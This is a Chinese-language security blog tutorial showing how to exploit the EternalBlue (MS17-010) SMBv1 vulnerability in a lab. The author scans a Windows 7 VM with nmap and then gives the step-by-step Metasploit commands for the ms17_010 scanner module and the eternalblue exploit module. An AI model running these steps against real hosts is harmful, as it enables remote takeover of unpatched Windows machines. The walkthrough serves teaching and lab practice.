标题 简介 类型 公开时间
关联规则 关联知识 关联工具 关联文档 关联抓包
参考1(官网)
参考2
参考3
详情
[SAFE-ID: JIWO-2024-3334]   作者: 影 发表于: [2023-09-06]

本文共 [42] 位读者顶过

1 漏洞简介

1.1 永恒之蓝介绍

  永恒之蓝漏洞(MS17-010),它的爆发源于 WannaCry 勒索病毒的诞生,该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的漏洞 “EternalBlue”(永恒之蓝)进行改造而成。

1.2 漏洞原理

  永恒之蓝漏洞通过 TCP 的445和139端口,来利用 SMBv1 和 NBT 中的远程代码执行漏洞,通过恶意代码扫描并攻击开放445文件共享端口的 Windows 主机。只要用户主机开机联网,即可通过该漏洞控制用户的主机。

2 环境准备

  攻击机:Linux Kali(ip:192.168.192.131)

  靶机:Windows7 X64(ip:192.168.192.130)

  注意:两台机子要相互ping通,并且靶机开启了445端口,防火墙是关闭的。

3 攻击流程

3.1 检测445端口是否开启

   nmap 192.168.192.130

3.2 使用msf的永恒之蓝漏洞模块

(1)打开msf:msfconsole

(2)搜索ms17_010:search ms17_010

其中auxiliary/scanner/smb/smb_ms17_010 是永恒之蓝扫描模块, exploit/windows/smb/ms17_010_eternalblue 是永恒之蓝攻击模块。先扫描,若显示有漏洞,再进行攻击。

3.3 使用ms17_010扫描模块,对靶机进行扫描

(1)使用模块:use auxiliary/scanner/smb/smb_ms17_010

(2)查看设置选项:show options

(3)设置目标ip:set RHOSTS 192.168.192.130

(4)执行扫描:run

存在漏洞。

3.4 使用ms17_010攻击模块,对靶机进行攻击

(1)使用模块:use exploit/windows/smb/ms17_010_eternalblue

[出自:jiwo.org]

(2)查看设置选项:show options


(3)设置目标ip:set RHOSTS 192.168.192.130


(4)执行扫描:run

攻击成功。

评论

暂无
发表评论
 返回顶部 
热度(42)
 关注微信